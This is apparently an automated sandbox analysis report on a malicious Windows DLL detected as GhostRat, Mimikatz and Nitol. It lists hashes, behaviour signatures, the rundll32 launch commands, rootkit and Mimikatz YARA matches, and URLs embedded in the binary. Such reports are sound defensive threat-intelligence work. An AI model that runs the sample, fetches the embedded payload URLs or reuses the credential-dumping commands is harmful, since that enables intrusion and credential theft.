
Windows Analysis Report
l10U7QN0CY.dll

Overview

General Information

Sample name: l10U7QN0CY.dll (renamed because original name is a hash value)
Original sample name: f036b3031238597750e077c2d03b2bc41d089f9db461244059db8485fac28e63.dll
Analysis ID: 1557658
MD5: 4a2579809a60dafdd9da2c50484e8735
SHA1: d3e1c79b5b5d7ab8ff2313d7696998527a3f5bd1
SHA256: f036b3031238597750e077c2d03b2bc41d089f9db461244059db8485fac28e63
Tags: 103-45-64-91, dll, user-JAMESWT_MHT

Detection

GhostRat, Mimikatz, Nitol
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GhostRat
Yara detected Mimikatz
Yara detected Nitol
AI detected suspicious sample
Checks if browser processes are running
Contains functionality to automate explorer (e.g. start an application)
Contains functionality to capture and log keystrokes
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Contains functionality to modify windows services which are used for security filtering and protection
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to create new users
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check if the current machine is a sandbox (GetTickCount - Sleep)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • loaddll32.exe (PID: 5796 cmdline: loaddll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2676 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 2408 cmdline: rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 6812 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 1476 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 6528 cmdline: rundll32.exe C:\Users\user\Desktop\l10U7QN0CY.dll,Shellex MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 6688 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4696 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: MimiKatz
Description: Varonis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks. Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.
Attribution:
  • APT32
  • Anunak
  • GALLIUM
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz

Name: Nitol
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol
No configs have been found
Source: l10U7QN0CY.dll, Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Author: Joe Security
Source: l10U7QN0CY.dll, Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Author: Joe Security
Source: l10U7QN0CY.dll, Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Author: Joe Security
Source: l10U7QN0CY.dll, Rule: Mimikatz_Strings, Description: Detects Mimikatz strings, Author: Florian Roth
  • 0x11fcd7:$x1: sekurlsa::logonpasswords
Source: l10U7QN0CY.dll, Rule: INDICATOR_TOOL_RTK_HiddenRootKit, Description: Detects the Hidden public rootkit, Author: ditekSHen
  • 0x10444a:$h1: Hid_State
  • 0x1169b0:$h1: Hid_State
  • 0x10445e:$h2: Hid_StealthMode
  • 0x1169d0:$h2: Hid_StealthMode
  • 0x10447e:$h3: Hid_HideFsDirs
  • 0x1169f0:$h3: Hid_HideFsDirs
  • 0x10449c:$h4: Hid_HideFsFiles
  • 0x116a10:$h4: Hid_HideFsFiles
  • 0x1044bc:$h5: Hid_HideRegKeys
  • 0x116a30:$h5: Hid_HideRegKeys
  • 0x1044dc:$h6: Hid_HideRegValues
  • 0x116a50:$h6: Hid_HideRegValues
  • 0x104500:$h7: Hid_IgnoredImages
  • 0x116a80:$h7: Hid_IgnoredImages
  • 0x104524:$h8: Hid_ProtectedImages
  • 0x116ab0:$h8: Hid_ProtectedImages
  • 0x108d66:$s1: FLTMGR.SYS
  • 0x11c6da:$s1: FLTMGR.SYS
  • 0x1092e2:$s2: HAL.dll
  • 0x105e86:$s3: \SystemRoot\System32\csrss.exe
  • 0x118630:$s3: \SystemRoot\System32\csrss.exe

Source: 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Author: Joe Security
Source: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Author: Joe Security
Source: 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Author: Joe Security
Source: Process Memory Space: loaddll32.exe PID: 5796, Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Author: Joe Security
Source: Process Memory Space: rundll32.exe PID: 6528, Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Author: Joe Security

Source: 9.2.rundll32.exe.1010b380.2.unpack, Rule: INDICATOR_TOOL_RTK_HiddenRootKit, Description: Detects the Hidden public rootkit, Author: ditekSHen
  • 0xaa30:$h1: Hid_State
  • 0xaa50:$h2: Hid_StealthMode
  • 0xaa70:$h3: Hid_HideFsDirs
  • 0xaa90:$h4: Hid_HideFsFiles
  • 0xaab0:$h5: Hid_HideRegKeys
  • 0xaad0:$h6: Hid_HideRegValues
  • 0xab00:$h7: Hid_IgnoredImages
  • 0xab30:$h8: Hid_ProtectedImages
  • 0xfb5a:$s1: FLTMGR.SYS
  • 0xc6b0:$s3: \SystemRoot\System32\csrss.exe
  • 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
Source: 9.2.rundll32.exe.1010b380.2.raw.unpack, Rule: INDICATOR_TOOL_RTK_HiddenRootKit, Description: Detects the Hidden public rootkit, Author: ditekSHen
  • 0xb630:$h1: Hid_State
  • 0xb650:$h2: Hid_StealthMode
  • 0xb670:$h3: Hid_HideFsDirs
  • 0xb690:$h4: Hid_HideFsFiles
  • 0xb6b0:$h5: Hid_HideRegKeys
  • 0xb6d0:$h6: Hid_HideRegValues
  • 0xb700:$h7: Hid_IgnoredImages
  • 0xb730:$h8: Hid_ProtectedImages
  • 0x1135a:$s1: FLTMGR.SYS
  • 0xd2b0:$s3: \SystemRoot\System32\csrss.exe
  • 0xec80:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
Source: 5.2.loaddll32.exe.1010b380.2.raw.unpack, Rule: INDICATOR_TOOL_RTK_HiddenRootKit, Description: Detects the Hidden public rootkit, Author: ditekSHen
  • 0xb630:$h1: Hid_State
  • 0xb650:$h2: Hid_StealthMode
  • 0xb670:$h3: Hid_HideFsDirs
  • 0xb690:$h4: Hid_HideFsFiles
  • 0xb6b0:$h5: Hid_HideRegKeys
  • 0xb6d0:$h6: Hid_HideRegValues
  • 0xb700:$h7: Hid_IgnoredImages
  • 0xb730:$h8: Hid_ProtectedImages
  • 0x1135a:$s1: FLTMGR.SYS
  • 0xd2b0:$s3: \SystemRoot\System32\csrss.exe
  • 0xec80:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
Source: 9.2.rundll32.exe.100fbd38.1.unpack, Rule: INDICATOR_TOOL_RTK_HiddenRootKit, Description: Detects the Hidden public rootkit, Author: ditekSHen
  • 0x7b12:$h1: Hid_State
  • 0x7b26:$h2: Hid_StealthMode
  • 0x7b46:$h3: Hid_HideFsDirs
  • 0x7b64:$h4: Hid_HideFsFiles
  • 0x7b84:$h5: Hid_HideRegKeys
  • 0x7ba4:$h6: Hid_HideRegValues
  • 0x7bc8:$h7: Hid_IgnoredImages
  • 0x7bec:$h8: Hid_ProtectedImages
  • 0xc42e:$s1: FLTMGR.SYS
  • 0xc9aa:$s2: HAL.dll
  • 0x954e:$s3: \SystemRoot\System32\csrss.exe
  • 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
  • 0x258:$s5: INIT
  • 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
Source: 5.2.loaddll32.exe.1010b380.2.unpack, Rule: INDICATOR_TOOL_RTK_HiddenRootKit, Description: Detects the Hidden public rootkit, Author: ditekSHen
  • 0xaa30:$h1: Hid_State
  • 0xaa50:$h2: Hid_StealthMode
  • 0xaa70:$h3: Hid_HideFsDirs
  • 0xaa90:$h4: Hid_HideFsFiles
  • 0xaab0:$h5: Hid_HideRegKeys
  • 0xaad0:$h6: Hid_HideRegValues
  • 0xab00:$h7: Hid_IgnoredImages
  • 0xab30:$h8: Hid_ProtectedImages
  • 0xfb5a:$s1: FLTMGR.SYS
  • 0xc6b0:$s3: \SystemRoot\System32\csrss.exe
  • 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ

System Summary

Source: File created, Author: Florian Roth (Nextron Systems), Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 6688, TargetFilename: C:\Users\Public\Documents\MM
No Suricata rule has matched

AV Detection

Source: l10U7QN0CY.dll, Avira: detected
Source: l10U7QN0CY.dll, ReversingLabs: Detection: 68%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 85.3% probability
Source: l10U7QN0CY.dll, Joe Sandbox ML: detected
Source: l10U7QN0CY.dll, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: Binary string: F:\hidden-master\x64\Debug\QAssist.pdb source: loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll
Source: Binary string: rundll32.pdb source: rundll32.exe, 00000009.00000002.3726452574.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp, svchos1.exe.9.dr
Source: Binary string: rundll32.pdbGCTL source: rundll32.exe, 00000009.00000002.3726452574.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp, svchos1.exe.9.dr
Source: Binary string: F:\hidden-master\Debug\QAssist.pdb source: loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_100254C0 wcstombs,NetUserEnum,wcstombs,NetApiBufferFree,NetApiBufferFree,LocalAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalReAlloc,5_2_100254C0
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_100254C0 wcstombs,NetUserEnum,wcstombs,NetApiBufferFree,NetApiBufferFree,LocalAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalReAlloc,9_2_100254C0
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_10009080 lstrlenA,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlenA,FindNextFileA,LocalFree,FindClose,5_2_10009080
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_100092A0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,5_2_100092A0
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_100097D0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,#823,#825,wsprintfA,FindNextFileA,FindClose,5_2_100097D0
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_1002AB10 lstrcatA,lstrcatA,lstrcatA,FindFirstFileA,GetPrivateProfileStringA,lstrlenA,strstr,GetPrivateProfileStringA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,FindNextFileA,FindClose,5_2_1002AB10
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_10009B60 FindFirstFileA,FindClose,FindClose,5_2_10009B60
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_10009C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,5_2_10009C40
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_1000BD50 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z,?_Xran@std@@YAXXZ,?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,FindFirstFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,#825,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,DeleteFileA,#825,FindNextFileA,FindClose,RemoveDirectoryA,#825,5_2_1000BD50
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_10009080 lstrlenA,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlenA,FindNextFileA,LocalFree,FindClose,9_2_10009080
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_100092A0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,9_2_100092A0
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_100097D0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,#823,#825,wsprintfA,FindNextFileA,FindClose,9_2_100097D0
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_1002AB10 lstrcatA,lstrcatA,lstrcatA,FindFirstFileA,GetPrivateProfileStringA,lstrlenA,strstr,GetPrivateProfileStringA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,FindNextFileA,FindClose,9_2_1002AB10
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_10009B60 FindFirstFileA,FindClose,FindClose,9_2_10009B60
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_10009C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,9_2_10009C40
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_1000BD50 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z,?_Xran@std@@YAXXZ,?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,FindFirstFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,#825,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,DeleteFileA,#825,FindNextFileA,FindClose,RemoveDirectoryA,#825,9_2_1000BD50
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_10008E50 GetLogicalDriveStringsA,GetUserNameA,_strcmpi,SHGetFolderPathA,CloseHandle,lstrlenA,lstrlenA,lstrlenA,GetVolumeInformationA,SHGetFileInfoA,lstrlenA,lstrlenA,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlenA,5_2_10008E50
Source: C:\Windows\System32\loaddll32.exe, Code function: 4x nop then mov eax, dword ptr [esp+04h] 5_2_1002E040
Source: C:\Windows\System32\loaddll32.exe, Code function: 4x nop then test byte ptr [101218D4h], 00000008h 5_2_1003E318
Source: C:\Windows\System32\loaddll32.exe, Code function: 4x nop then movdqa dqword ptr [edi], xmm7 5_2_1003E490
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4x nop then mov eax, dword ptr [esp+04h] 9_2_1002E040
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4x nop then test byte ptr [101218D4h], 00000008h 9_2_1003E318
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4x nop then movdqa dqword ptr [edi], xmm7 9_2_1003E490
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_10014060 InternetOpenA,InternetConnectA,InternetCloseHandle,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HttpSendRequestA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HttpQueryInfoA,#823,HttpQueryInfoA,#825,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,strstr,strstr,#825,strstr,strncpy,strstr,#825,strstr,strncat,strstr,#825,InternetOpenA,InternetConnectA,InternetCloseHandle,sprintf,sprintf,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,sprintf,HttpSendRequestA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,atol,#823,InternetReadFile,#825,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,MultiByteToWideChar,#823,MultiByteToWideChar,#825,WideCharToMultiByte,#823,WideCharToMultiByte,#825,strstr,#825,#825,5_2_10014060
Source: loaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll, String found in binary or memory: http://ptlogin2.qun.qq.com%s
Source: loaddll32.exe, rundll32.exe, String found in binary or memory: http://ptlogin2.qun.qq.com%sAccept-Language:
Source: loaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll, String found in binary or memory: http://qun.qq.com%s
Source: loaddll32.exe, rundll32.exe, String found in binary or memory: http://qun.qq.com%sAccept-Language:
Source: loaddll32.exe, loaddll32.exe, 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll, String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt
Source: loaddll32.exe, loaddll32.exe, 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll, String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt
Source: loaddll32.exe, 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll, String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txthttps://
Source: loaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll, String found in binary or memory: https://localhost.ptlogin2.qq.com:4301%s
Source: loaddll32.exe, rundll32.exe, String found in binary or memory: https://localhost.ptlogin2.qq.com:4301%sAccept-Language:
Source: loaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll, String found in binary or memory: https://ssl.ptlogin2.qq.com%s
Source: loaddll32.exe, rundll32.exe, String found in binary or memory: https://ssl.ptlogin2.qq.com%sAccept-Language:
Source: rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll, String found in binary or memory: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\System32\loaddll32.exe, Code function: <BackSpace> 5_2_1000B840
Source: C:\Windows\System32\loaddll32.exe, Code function: <Enter> 5_2_1000B840
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: <BackSpace> 9_2_1000B840
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: <Enter> 9_2_1000B840
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_100025B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,GlobalUnlock,CloseClipboard,5_2_100025B0
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_100026B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,5_2_100026B0
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_10002770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,5_2_10002770
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_100029D0 printf,OpenClipboard,GlobalAlloc,GlobalLock,strstr,strstr,strstr,atoi,strstr,strstr,strstr,atoi,Sleep,Sleep,atoi,strstr,Sleep,Sleep,printf,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_100029D0
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_10017BB0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,5_2_10017BB0
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_100026B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,9_2_100026B0
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_10002770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,9_2_10002770
